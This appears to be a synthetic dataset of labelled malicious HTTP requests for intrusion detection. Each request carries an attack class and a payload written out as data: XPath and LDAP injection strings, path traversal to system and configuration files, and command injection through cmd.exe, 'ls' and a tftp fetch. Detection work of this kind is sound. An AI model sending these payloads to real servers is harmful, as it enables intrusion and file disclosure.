Warning: 410 www.st6tgso.css "mdhmtyeir8nd" "Tue, 20 Jul 04 04:31:53 CET"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49500
Start - Id: 48532
class: XPathInjection
POST /NaxR02Bc4BK/pEh/botilnoTaesnanrutk2t/3R7/yGIwp/uTnY8VW/i3uK1HkIIbxtQkbBfMoq/pf-TAd8hmgyvGm_/tJXE.png? HTTP/1.0
Content-Length: 261
Content-Language: earn,l,s
Content-Encoding: compress
Content-Location: /eotP/lir4O/KnDth.tiff
Content-MD5: dHN6YTRhd0R0ZW5lZTVvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Sep 05 16:15:14 UTC
Last-Modified: Sat, 08 Aug 09 05:59:30 CET
Host: www.vrhsno.de
Connection: close
Accept: audio/basic;q=0.4, application/*;q=0.2, application/*;q=0.3
Accept-Charset: iso-8859-3, iso-8859-15;q=0.8, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: Sn-oli, ru-mtcb3d;q=0.1, 2tn-L, irebbcrn-lnosda6b, 3tn-e6oRk
Cache-Control: max-age=1703
Client-ip: 251.229.101.220
Cookie: ienmErlo=;;G_D6ladminNSetcVm=aVPKOv;eloslzvasL5ai=7;fXoJ6Zi=33493;u0XdexhiScfeihe=e4Hy-Q
Cookie2: $Version="5"
Date: Sun, 21 Aug 05 01:01:27 UTC
ETag: W/"tBZi-pENw9GtkAl"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Mon, 11 Sep 06 04:36:49 UTC
If-Match: "V_4wk@lB@KhnF357RIg"
If-None-Match: *
If-Range: "5Lhgk9biuM8pQYQ"
Max-Forwards: 77
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: NTLM OHRjb2EzZ2hvemd0YXZBbE42Z3hpd2Fsbm9ubmZ0c21sZGxlYmJzNWxwYW5hcg==
Range: 51-93,35-2637,65821-
Referer: http://www.atAtss.it/pasAoeym/rnatew/nnihtt/dsos/Lnea.tiff
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 3.3; Ar-br; rv:5.4.3) Gecko/61072957
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: 4.5 69.8.111.18, 0.4 www.aehhbot.css
Transfer-Encoding: se1dre
Warning: 997 208.8.7.32:24 "H4ott" "Sun, 14 Mar 04 08:06:29 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oeeo=jabvbscripts&Sl=dtfeldsmYonktpuclh&anoeiGdo1twnrid=ei/tti9or/deo/child::node()[ position()=4]    |  iOy/eyopsf/Ts/child::text()[position()=269]     or  'Eotaetr'  =  '&itehyMloonhqutu=i2onuturqerodo

End - Id: 48532
Start - Id: 37368
class: LdapInjection
GET /Y@.htpassJSS1Lcx/tPwWgw/nCsQPqRKOim/u1df4sK/cuef3ntfoen9fh/dkidhuplepoCoSi/6n/rTmeiZA6/pfeeoecsuhtodtt.cfm?t3Dihhbb=7520768&osmrliRa6ap9=aEDoOp8xFnqD&emeh5iha=aebgsoundyeAhpnullyru%27logtp&5xsninMs0hflpsf=yei&lk5aege3eUecn=seLwPwre&oe=e6imnf&ourfpihioch=+aand%29p&ti1tupem=42&r4hayjeqTad=ycrIotasiHr7Gezsx HTTP/1.0
Host: www.PchtA.uk
Connection: wnsxlr
Accept: text/*;q=0.6
Accept-Charset: hz-gb-2312;q=0.2, iso-8859-2;q=0.2, gb2312
Accept-Encoding: compress, identity;q=0.3, compress, compress;q=0.6
Accept-Language: )   (    |   (displayName=had*)(name   = had*    )(    mail=had* )
Cache-Control: only-if-cached
Client-ip: 186.113.192.51
Cookie2: $Version="00"
Date: Thu, 22 Sep 05 10:34:40 CET
If-Modified-Since: Sun, 07 Mar 10 10:44:10 UTC
If-Match: "YofyW7y08ncjcEr"
If-Range: Wed, 17 Mar 04 19:09:46 CET
Max-Forwards: 64
Authorization: NTLM aGk1dGhsYW9vcnN6YWpycmw0RGZoMGRydGE1Y2lqMW9iUW5waXN0aXJkZ2E=
Referer: /6lan/aa4ynmiu/ebdt2/Jiasn.wav
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: n54Jns/8.1.1.5
Transfer-Encoding: compress
X-Forwarded-For: 170.106.4.226

null

End - Id: 37368
Start - Id: 46216
class: PathTransversal
GET /sdef4hhj2u8Tmhn3dsl/eSuRaiQSlFT/rIJIb1@nUo3VSDKQvZO./Eled8vkopsis/dt4seevreom/ntmY-lusHxo77wefE2/jxUH/svt9oothheyacleschC/iLhw2HWf8.mdb?a7nurxts=ethe3deeega&raraiHst=3af&d1otdnreiog3a=%2Fetc%2Fhttpd%2Fhttpd.conf&S58esotft=a%3Csiosriskqezi&I8gkhU=openftp&dmTolwlsgsa=g1&mki0=qrT5m&qhvXGeXjBB=gnw&acbe4haeRt=thvJ.m9 HTTP/1.0
Host: 230.131.149.194:2
Connection: eulsekd
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: r-iAoyeoi;q=0.6, s-cW;q=0.9, nawnntod-lulhdet;q=0.8, cWelnea-vl5;q=0.6
Cache-Control: only-if-cached
Client-ip: 244.185.69.193
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="6"
Date: Tue, 04 Apr 06 05:01:33 UTC
ETag: "lyp56_QbpqgxD-1"
Expect: 100-continue
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Wed, 05 Mar 08 22:16:58 GMT
If-Match: "ji2IcZ_4V6jG5Rw5QiI5"
If-None-Match: "ha1oP@_5HHEQjyF6AiKT"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.5
Pragma: bt='lptreitl'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: http://www.darawtk.com/ASk0aEhs.tar
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/7.7 (compatible; Konqueror/5.4; WinNT; trlidnsa; rnrTql; eyurcqoe)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: FTP/0.3 115.106.41.188, 3.6 149.83.176.182:3376
Transfer-Encoding: aLnyd
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46216
Start - Id: 36616
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.efs2.be
Connection: crqr
Accept: application/x-tar;q=0.7, audio/*, audio/basic
Accept-Charset: x-mac-korean, windows-1252;q=0.1, x-mac-korean, iso-8859-6
Accept-Encoding: 
Accept-Language: B-aoosl0, e1ttjed-fa3s, caZn-ue
Cache-Control: no-store
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="9"
Date: Sat, 07 Feb 04 17:57:23 CET
ETag: "19NZywTcR7rRSt-Yo"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Thu, 09 Jun 05 17:45:17 UTC
If-Unmodified-Since: Wed, 21 Sep 05 17:41:10 CET
If-Match: *
If-None-Match: *
If-Range: "Hy7Yen2Nw_C8liEHvP"
Max-Forwards: 018
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest qop=auth
Range: 8050-
Referer: http://www.eheh.st/jrht8sca.png
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: bteetnu (iv84njrSF; 4430F8hg; uiTo9AbTaI; taZpeGqE; v7Je1yRZ)
UA-CPU: MIPS
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 www.a1tuteos.gif, FTP/8.5 167.177.49.173:44, 8.0 www.rctpen3.htm
Transfer-Encoding: deflate
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36616
Start - Id: 48982
class: XPathInjection
GET /5eHe2defHEitrEupe.php?strsO=72824404&L7hntEinr=089++++or+++3ioaS%2FEB%2Fbcath%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D12%5D++or++96%3D HTTP/1.0
Host: www.stcilO6a.fr
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.6, gb2312, macintosh;q=0.6, x-mac-ce, windows-1250;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.95.198.49
Cookie: dlesOasCoot=o@S
Cookie2: $Version="9"
Date: Thu, 06 Jul 06 13:38:23 UTC
ETag: W/"lPG-MvOD7oai6QqX"
Expect: weiamii
From: 6icshpO@RtgPShLon.org
If-Modified-Since: Sat, 17 Dec 05 09:19:30 CET
If-Unmodified-Since: Sat, 21 Feb 04 06:33:42 GMT
If-Match: "Ji1bZJJEocmtxGF9aP"
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: "CGu19_3Px1FMCkUCO1"
Max-Forwards: 56
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: NTLM cmVsOVRkY2Fob3I1MUNnam9jZWE0dG9yZW9vZGFnczhudHd6ZHNkdG9i
Range: 23-,057-,45-
Referer: /naatl1/h2hseeoW/txtcl.swf
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: 8oah4e/6.4
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 395x881
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48982
Start - Id: 36135
class: PathTransversal
GET /eegzog7/rj/lmyrrIinc/vQ-wHfX/AmeSQrwx-KZ2t/oh1dwlrb/Iraitq5l5c/ze7atin4foehsnnrsai/sockaamoetlwlsw7End/ogSVov_@CYCoifJH/FGwZ/and1Ug_8_boF-9J.asmx?ufUa9I45Ghttp=Elhiot6n9n27h&sAaznwjacee9e=syiozhnti&irp3Imde=yoDr3&ph=32&ticgetp8dnn=1221&xrs=7af&like5HYyGhtpasstBbf1=re0&NQM3FservicesSspUM=887016&Qp5Vor81zHG=9mE6yhttpsaN0xmletcectlwn%5D&tiaC=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&sbsnar5idenoo=pYEAn&tmysrehudaoPO=rgtfgu&u3adua3ge=tscnpsho0nA+dL%2F-nd HTTP/1.0
Host: 107.168.83.156:3
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.0, x-mac-greek, iso-8859-8;q=0.9
Accept-Encoding: deflate;q=0.1, identity, gzip, identity;q=0.5
Accept-Language: *;q=0.1
Cache-Control: max-age=3
Client-ip: 77.156.80.102
Cookie: Ermocha27NNeQcopy=0fGYbn;ic=5
Cookie2: $Version="150"
Date: Wed, 16 Feb 05 24:08:06 CET
ETag: W/"eFAEGFJtDEm80bv04liq"
Expect: ieg5
From: regt5wfi@r275i.st
If-Modified-Since: Fri, 09 Feb 07 21:31:03 UTC
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 10 May 09 24:01:01 CET
Max-Forwards: 072
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dv2sl edbc=qyempezk
Range: -535722,74763-864722,-62713
Referer: http://ldnmate.org/Aiya/iid3/axrh9eq.conf
TE: deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: mtiI8difgtaians
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 4.9 www.dNaaoe.jpeg, HTTP/0.8 www.t7rdhxNt.htm
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36135
Start - Id: 43543
class: OsCommanding
GET /ts/clmdbf0_K/mn8SsC/vpceht9a7gops0yorpt/aia8ah9iPbAsg6aii2/eLjn/pAwhereQptFBoxGc.html?4erS=bsraeroettd&fcSQT6O=kwybno%3A+hrgn5%7Et&iRqcee3yhoj4ba=positione&Ilyh=hI0Co7umC8&6z@hdLW=tohn+&1SonhlaGmheoe=s%25uj%7Ei&9fsUlN1h=857699581&noseektdemepx=+u5&orhgTrac=4021872&s4moorrslstbd=ls++-las+%2Fhome%2F+++++%7C&cp=0746624&l4neelh=nwtetcjsrzsiayopt&s9l4hn=linkweuRdixrcpt&rei7sh4chae=465&rboot.inisapasswd0PMH=%3FSens HTTP/1.0
Host: 60.180.52.226
Connection: close
Accept: text/*;q=0.5, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: onhretpt-onit;q=0.6, hdpeEtd-at45;q=0.0
Cache-Control: only-if-cached
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="061"
Date: Mon, 20 Jun 05 13:11:16 GMT
ETag: W/"LAnz5Rj1v.GFfze"
Expect: hhdoic
From: dmmdhau@nI4vEb.com
If-Modified-Since: Sun, 04 Apr 04 24:32:08 GMT
If-Unmodified-Since: Sat, 23 Oct 04 05:48:14 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: NTLM blJlZWxzb2FlV2xlcmxpZXRlcml6bmRsb2FkdTdobWtzZDI5bw==
Range: 387259-2,9-
Referer: /eldh/etrealso.jsp
TE: deflate,trailers
Trailer: Expect
User-Agent: koryeswrrb/3.6.3
UA-CPU: x86
UA-Disp: 230,276,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5688x504
Via: 7.8 www.farin.jpeg, 4.1 www.t0dlt.css
Transfer-Encoding: compress
Upgrade: tatTmi/7.0
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 166.207.32.118
X-Serial-Number: 431097380
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43543
Start - Id: 48802
class: XPathInjection
GET /a7uoloeicrmgmtetd.sh?@C5stylenunion=E%29sto&enylo=tta&74ckxTpfue=72759&FE=ihscripth+lonr4&YiframeODFfaWF=pmFe1Ptv6tdmetIcj&uaccept5k=%3Ds&mctoa=9orthe%288&f5=dxwp7Lct&iframeLYLFfromobjectphp=k%24%2FD&ooIrdrnirr=lni%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++%276uotiigh%27%3D++++%27&uuf=064925&Z94passthrubk2=h4&mxs9n6o=ug%26+hdstaf1dw%40f%3Ce HTTP/1.1
Host: www.Eees2xtce.de
Connection: onoh
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity;q=0.0, compress;q=0.4, deflate;q=0.0
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 15.151.104.240
Cookie: re=tajc4;CzteNietiv3bsen=4771705
Cookie2: $Version="875"
Date: Tue, 13 Apr 10 11:27:59 GMT
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: x2larteo
From: aTnmcfs@so3eotuens.gov
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Tue, 08 Sep 09 13:43:45 CET
If-Match: "QTaeMLLAfPmBpNJvNm"
If-None-Match: *
If-Range: *
Max-Forwards: 080
MIME-Version: 5.2
Pragma: lorn1='aeta5a'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Digest nonce
Range: -77394
Referer: http://www.aE5aunq.de/Nse9ceo/Tvzlrdt/aelTg/ytHi.png
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 5.8; sq-nx; rv:5.4.2) Gecko/59311909
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 807x856
Via: FTP/2.1 www.st5aibde.png, 5.6 www.feasan.htm:5563, eaTFn/6.5 24.175.176.77:967
Transfer-Encoding: compress
Upgrade: Abotid/5.1, aaihiE/4.1, eennhd/8.8, 4euri/4.1, ssnsa6/5.8
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48802
Start - Id: 48625
class: XPathInjection
POST /hMzh7yjLS73P1w-kMsRu/NtilhieuhSese/cgnt4t/passthruKeXTlPiK/lZe2MD8PgE3GhWWY/ictfttWriMiic/wmQjQoA2NExx4OQfaGQ.jpg? HTTP/1.1
Content-Length: 549
Content-Language: 3sTg1,teeahash,o
Content-Encoding: compress
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: NjZoZ29uRG5lREVhSGl6ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Dec 08 03:31:03 UTC
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: www.tfhTiDhk.net
Connection: t3nr
Accept: */*
Accept-Charset: iso-8859-2, iso-2022-kr;q=0.5, cp-932, macintosh;q=0.9, x-mac-arabic
Accept-Encoding: 
Accept-Language: fvpoat-rlPae;q=0.7, oe-nH, iwnmmopi-ciplloc;q=0.0, 9-n;q=0.3
Cache-Control: max-stale=69394
Client-ip: 68.45.171.152
Cookie: d33=40141;AfOe=insertmochaz|bothdbhclii h ;Bou=4;iCmebc=12990;rmatltea=cHJ
Cookie2: $Version="9"
Date: Tue, 17 Feb 04 13:55:58 CET
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: rcneifm=nmthhk;6exTej01=esgtdhS2
From: wsnewerh@atausf.it
If-Modified-Since: Sat, 06 Feb 10 10:54:15 CET
If-Unmodified-Since: Thu, 05 Jun 08 20:13:58 UTC
If-Match: "-c95yXrVlBW9d_JI"
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Tue, 17 Oct 06 12:48:14 UTC
Max-Forwards: 752
MIME-Version: 7.4
Pragma: d=teqSaaes
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: etd1t rnmaes4t=eSeEh
Range: 939-64,563448-00397,65796-
Referer: /luemaor/A7igytje.jpg
TE: deflate;q=0.2
Trailer: Referer
User-Agent: qdany2i7os/2.1.2.8
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: ossh3
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

0Z-MRscriptS1='cmochan+5hnodee|] 7euf&iNvMerpTnt=r3oottA?&mkO&eepmborarfob=at8breE'  or count(path/child::node()[position(    )=(( i    + j+   k +    l    +    1)]     |   path/child::*()[position()=(k+1)])=1     or 'rr'    =   ' theq'   or&Pey9JPTYI9iT=78cEjlSETeOR&ucgEd5dajh9=275&eaodnit=9970&eeihnam=8&rha9hoeeE=tsd&tbolpqerfjnttr=n0~usrn:rcpbev<&ituk4=irseda6noeweds&ceiesnEd=4nullcupt&8stgEbdtnier=598669&vimo8lMdontRdt=nwroked&ndaLe=gir)totso

End - Id: 48625
Start - Id: 49521
class: XPathInjection
GET /ocqS.tiff?rvad=l.f2&eAn=tonr&9orehtEcarrae=s%28bgsound&penHregp3ft=dJgbMJ&c6aea2vhtse=495570&tJCFnetcatfWOPv.=+g6&hpashtmaeatnpn=95+++or+++++1%3C+++re%2Fe6ha%2Fpwea%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D85%5D+++++or+++405%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&r1ss=r2t%3Ew&brEw=ld0aboaerxosaE5f&oktdwitHiata=682&deetc9et=unosat&eg4oahuEe71rm=c6pcc HTTP/1.0
Host: 250.225.8.158
Connection: close
Accept: text/*;q=0.4, video/quicktime;q=0.6, text/*
Accept-Charset: x-mac-turkish;q=0.9, cp-932;q=0.0
Accept-Encoding: 
Accept-Language: et1hm-mtEigic, becom-0xOTU;q=0.4, dhoeo8D-e, frrNMtg-2ltrwSs8
Cache-Control: max-stale
Client-ip: 236.52.73.161
Cookie: Pk9DYugN68=9dib;5ntr1o0feueiwo=7482192;YEdt4E63=zTm
Cookie2: $Version="709"
Date: Fri, 19 May 06 12:00:43 GMT
ETag: W/"64h4ckzIruMjC@Dq"
Expect: Set5qe
From: eaatpaso@ksiwaan.org
If-Modified-Since: Sat, 14 Aug 04 01:37:35 CET
If-Unmodified-Since: Wed, 30 Apr 08 06:36:39 GMT
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: *
If-Range: *
Max-Forwards: 389
MIME-Version: 4.3
Pragma: u=nclhRsa
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: http://qrci70.org/e11qiiu/ta9voxn/riuttnme/n3wEE/scdro.mdb
TE: deflate;q=0.5
Trailer: Range
User-Agent: Ebrpdo/5.3.9
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5470x3164
Via: HTTP/4.1 www.iamhu.png, 5.9 www.telee.css, 1.1 www.nqaientb.html
Transfer-Encoding: compress
Upgrade: 2ao/4.8
Warning: 600 www.plsuhdu5.css "oa6ejaaRibdipelretOe" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49521
Start - Id: 49214
class: XPathInjection
GET /ao/i7XhQw/hv8CM2N-vB/atalymeib0ae/nph-.CDLpmetaoT2BCD/etXBvbpLUksHAM_.V.pl?NaoxEzatt=116+++++or++th%2FtvrWre%2Ft%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D++++or+65%3D&5mailSwzOxp_cZcOw=30403&cdega=reaDi HTTP/1.1
Host: 169.47.77.87
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oaceta9p-noxh;q=0.2
Cache-Control: max-stale=6843
Client-ip: 105.50.230.232
Cookie: dyRecrlnddaulH=ontaieah;5XZcR=formAusA=n4plwot;LNB@PQEUUvu=e(nf;cvrh6eds=>);hdm=3;sMb5oyocnp=046918
Cookie2: $Version="19"
Date: Wed, 11 Nov 09 12:49:44 GMT
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Sun, 02 Oct 05 15:36:30 GMT
If-Unmodified-Since: Fri, 06 Jan 06 20:05:08 UTC
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Thu, 08 May 08 14:14:29 CET
Max-Forwards: 54
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Digest realm
Range: -392691
Referer: http://hamI.it/aoatnsu/tnwns.gz
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: eikx/5.9.4.4.1
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: gzip
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49214
Start - Id: 43603
class: OsCommanding
GET /uv5anousa7go/lte/bDYP-0yZZMleZ6/ts26R3SFliyS.css?HD1qabMm8=+Os&ocCoRaneas6e6h=S%5Da0&tisiabpreliuc=xxyilu%7C&iornooepsj=aen&PRex_U08o9T=9711&2wQsam@=os&ZvG@x5LZgYJM=%5Cnuftp+-p+++++www.maalrens.com+++%2Fsttiin%2Frilitiisleto%2Ferto%2Fch%2Fns%2Fla&iaeOabdteee=wrAr%3A&t0daOD1t0O=rqiiotleonnaeee9ae&ikfeo=8434638 HTTP/1.1
Host: 179.87.212.200
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate, gzip, gzip;q=0.9
Accept-Language: aulisrs-nllt5sa;q=0.6
Cache-Control: EtOt=ypfd6
Cookie: dflpsuusrf=hhid3eehtha gre;igesripiIhlnnjh=r0SLAzAFu
Cookie2: $Version="136"
Date: Thu, 15 May 08 17:53:44 GMT
ETag: "Pwh_.Xof9x2dotg0qHH"
Expect: 100-continue
From: awehd@endxee1r.de
If-Modified-Since: Fri, 03 Dec 04 14:54:56 GMT
If-Unmodified-Since: Thu, 15 Dec 05 19:01:52 GMT
If-None-Match: *
If-Range: Fri, 30 Jun 06 04:57:17 GMT
Max-Forwards: 09
Pragma: 3tBe=n0
Proxy-Authorization: Digest username="ra7l0urn"
Authorization: ert8 sliox7it=enta
Range: 9-,347230-,48520-80
Referer: /ua0saS/httT/mdve/0oOze/hsae6sj.wav
User-Agent: 5Hmiwafenhr0nhnoto
UA-Disp: 4020,061,32
UA-OS: WinNT
Via: FTP/0.5 57.62.83.112
Transfer-Encoding: IUhe; baEti8te=Qpkwa
Upgrade: vrassd/8.3, ytno7/0.2
X-Forwarded-For: 114.218.60.229
X-Serial-Number: 0460781607316312
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43603
Start - Id: 48762
class: XPathInjection
GET /f-Cj4WnA/EotesbsiAnle/cory88mfag/HwIdivH45ePAzEPr/N.MpsphpTautoexecbetweenV/e3moFlHW5Mr0Ec3Y.Q/o2iairrSihNha79sotu/er.cgi?eeH1=YtrtedIa&esa=456&tl3fg=%3D2cmi&6n=7979+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+81407%3D HTTP/1.1
Host: 229.1.60.40
Connection: close
Accept: video/mpeg;q=0.6, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.145.186.132
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Mon, 10 Aug 09 24:12:09 GMT
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Tue, 23 Jun 09 20:08:32 GMT
If-Unmodified-Since: Fri, 02 Jul 04 17:23:40 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: Sun, 12 Apr 09 19:20:37 UTC
Max-Forwards: 4198
MIME-Version: 1.8
Pragma: eaar=e
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: NTLM NnQzZW5zZXJTcmVibWFldGxlb2VPaUFsb25kaDFyYjR1eQ==
Range: 11-
Referer: /ts6htl/swki/NiisiRX.ace
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 3.1; re-aa; rv:3.1.6) Gecko/77781618
